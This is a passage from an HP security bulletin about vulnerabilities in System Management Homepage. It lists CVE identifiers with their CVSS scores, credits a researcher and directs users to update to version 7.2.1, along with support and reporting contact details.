CVE-2012-2110(AV:N/AC:L/Au:N/C:P/I:P/A:P)   7.5
CVE-2012-2311(AV:N/AC:L/Au:N/C:P/I:P/A:P)   7.5
CVE-2012-2329(AV:N/AC:L/Au:N/C:N/I:N/A:P)   5.0
CVE-2012-2335(AV:N/AC:L/Au:N/C:P/I:P/A:P)   7.5
CVE-2012-2336(AV:N/AC:L/Au:N/C:N/I:N/A:P)   5.0
CVE-2013-2355(AV:N/AC:M/Au:N/C:P/I:N/A:N)   4.3
CVE-2013-2356(AV:N/AC:L/Au:N/C:C/I:N/A:N)   7.8
CVE-2013-2357(AV:N/AC:M/Au:S/C:N/I:N/A:C)   6.3
CVE-2013-2358(AV:N/AC:M/Au:S/C:N/I:N/A:C)   6.3
CVE-2013-2359(AV:N/AC:M/Au:S/C:N/I:N/A:P)   3.5
CVE-2013-2360(AV:N/AC:M/Au:S/C:N/I:N/A:P)   3.5
CVE-2013-2361(AV:N/AC:M/Au:N/C:N/I:P/A:N)   4.3
CVE-2013-2362(AV:L/AC:H/Au:S/C:N/I:N/A:P)   1.0
CVE-2013-2363(AV:N/AC:H/Au:N/C:C/I:N/A:P)   6.1
CVE-2013-2364(AV:N/AC:L/Au:S/C:N/I:N/A:P)   4.0
CVE-2013-5217(AV:N/AC:H/Au:N/C:P/I:N/A:N)   2.6
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

The Hewlett-Packard Company thanks agix for working with the TippingPoint
Zero Day Initiative to report vulnerability CVE-2013-2362 to
security-al...@hp.com

RESOLUTION

HP has made System Management Homepage (SMH) v7.2.1 or subsequent available
for Windows and Linux to resolve the vulnerabilities.

Information and updates for SMH can be found at the following location:

http://h18013.www1.hp.com/products/servers/management/agents/index.html

HISTORY
Version:1 (rev.1) - 18 July 2013 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel.  For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is